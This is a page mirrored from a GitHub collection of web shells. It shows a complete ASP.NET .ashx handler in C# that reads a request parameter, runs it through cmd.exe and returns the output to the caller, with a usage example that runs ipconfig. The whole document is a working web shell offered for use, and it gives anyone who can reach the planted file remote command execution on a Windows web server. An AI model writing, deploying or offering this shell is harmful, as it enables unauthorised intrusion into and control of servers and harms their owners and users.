mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
b5a24c76b0
example as.ashx?x=ipconfig from : zone.wooyun.org
26 lines
796 B
Text
26 lines
796 B
Text
<%@ WebHandler Language="C#" Class="Handler2" %>
|
|
using System;
|
|
using System.Collections.Generic;
|
|
using System.Diagnostics;
|
|
using System.Web;
|
|
public class Handler2 : IHttpHandler {
|
|
public void ProcessRequest (HttpContext context) {
|
|
//string x = "-an";
|
|
string x = context.Request["x"];
|
|
Process prc=new Process();
|
|
prc.StartInfo.FileName="cmd.exe";
|
|
prc.StartInfo.UseShellExecute=false;
|
|
prc.StartInfo.RedirectStandardInput = true;
|
|
prc.StartInfo.RedirectStandardOutput = true;
|
|
prc.StartInfo.RedirectStandardError = true;
|
|
prc.StartInfo.CreateNoWindow = false;
|
|
prc.Start();
|
|
prc.StandardInput.WriteLine(x);
|
|
prc.StandardInput.Close();
|
|
context.Response.Write(prc.StandardOutput.ReadToEnd());
|
|
context.Response.End();}
|
|
public bool IsReusable {
|
|
get {
|
|
return false;
|
|
}
|
|
}}
|